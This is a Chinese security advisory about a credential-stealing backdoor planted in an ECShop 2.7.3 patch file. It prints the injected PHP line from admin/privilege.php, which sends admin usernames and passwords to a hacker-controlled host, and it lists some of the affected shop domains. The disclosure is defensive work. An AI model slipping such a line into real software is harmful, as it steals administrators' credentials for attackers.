ECShop是很多站长喜欢用的网店程序，其V2.7.3版本用户甚众。

2013年5月，SCANV网站安全中心曾经响应过ECShop网店程序的后门事件，本以为此事已了，不料在近日，又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。

经SCANV网站安全研究人员分析发现，这一次的后门代码存在于一个编号为273utf8_patch006的历史补丁文件包中。骇客将补丁包里的（\admin\privilege.php）文件篡改后，插入了一段记录后台用户及密码等信息的代码，并发送到一个由黑客控制的服务器上。值得注意的是，SCANV安全研究人员在分析前两次补丁后门代码里并没有发现本次的后门代码，因此，本次后门事件可能发生在前两次篡改之前。

本次骇客植入的后门代码：

文件\admin\privilege.php代码113-114行：

@file_get_contents('http://[马赛

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通过进一步分析发现“http://[马赛克]/”网站实际是被黑客入侵控制的网站（“肉鸡”），而且黑客用来收集密码等信息的文件目录还可以“历遍文件”，如图：

经过SCANV网站安全研究人员的下载并去重，发现大概有90个域名网站受影响。列表如下：

qq168.cn

www.yuexiubuy.com

www.189-139.com

web419798.dnsvhost.com

gmxieye.qumart.com

jessinskin.fei580.net

product.aegismax.com

www.sd52.com

www.qzsj.cn

www.aifuwang.net

www.hangzhougushi.com

www.wxbsy.com

shop.thlby.com

www.qibaoku.com

www.261p.com

huayichang.530599.com